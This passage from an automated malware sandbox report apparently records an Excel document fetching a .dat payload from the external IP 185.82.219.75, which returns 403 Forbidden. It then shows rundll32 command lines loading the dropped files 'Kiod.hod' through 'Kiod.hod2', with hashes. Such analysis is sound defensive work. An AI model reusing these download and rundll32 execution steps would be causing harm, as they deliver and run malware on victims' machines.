                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249170185.82.219.7580C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Apr 7, 2021 17:28:31.352185965 CEST2OUTGET /44293.7276049768.dat HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: 185.82.219.75
                Connection: Keep-Alive
                Apr 7, 2021 17:28:31.544941902 CEST3INHTTP/1.1 403 Forbidden
                Server: nginx
                Date: Wed, 07 Apr 2021 15:28:31 GMT
                Content-Type: text/html
                Content-Length: 548
                Connection: keep-alive
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                Code Manipulations

                Statistics

                Behavior

                Click to jump to process

                System Behavior

                General

                Start time:17:27:41
                Start date:07/04/2021
                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                Wow64 process (32bit):false
                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Imagebase:0x13f410000
                File size:27641504 bytes
                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:28:27
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:Rundll32 ..\Kiod.hod,DllRegisterServer
                Imagebase:0xfffb0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:28:28
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:Rundll32 ..\Kiod.hod1,DllRegisterServer
                Imagebase:0xfffb0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                General

                Start time:17:28:28
                Start date:07/04/2021
                Path:C:\Windows\System32\rundll32.exe
                Wow64 process (32bit):false
                Commandline:Rundll32 ..\Kiod.hod2,DllRegisterServer
                Imagebase:0xfffb0000
                File size:45568 bytes
                MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:high

                Disassembly

                Code Analysis

                Reset < >